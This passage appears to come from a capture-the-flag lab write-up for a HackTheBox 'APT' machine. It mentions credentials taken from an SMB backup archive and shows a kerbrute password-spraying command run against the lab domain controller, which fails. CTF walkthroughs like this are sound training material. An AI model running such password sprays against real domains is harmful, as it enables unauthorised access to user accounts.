Password Spraying Attack
The backup archive found in one of the target SMB shares, accessible by anyone, holds a vital set of files that contains the entire domain credentials. While those files appeared to be outdated from the testing as only a single domain user is validated, hashdump result shows a few CLEARTEXT credentials
┌──(kali㉿kali)-[~/…/labs/apt/smb/hashdump]
└─$ kerbrute passwordspray --dc apt.htb.local -d HTB.LOCAL ./users.txt 'Password123!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
version: v1.0.3 (9dad6e1) - 10/22/23 - Ronnie Flathers @ropnop
2023/10/22 19:16:37 > Using KDC(s):
2023/10/22 19:16:37 > apt.htb.local:88
2023/10/22 19:34:44 > Done! Tested 2000 logins (0 successes) in 1086.574 seconds
Password Spraying attack failed
There is no domain user that matches with the CLEARTEXT password; Password123!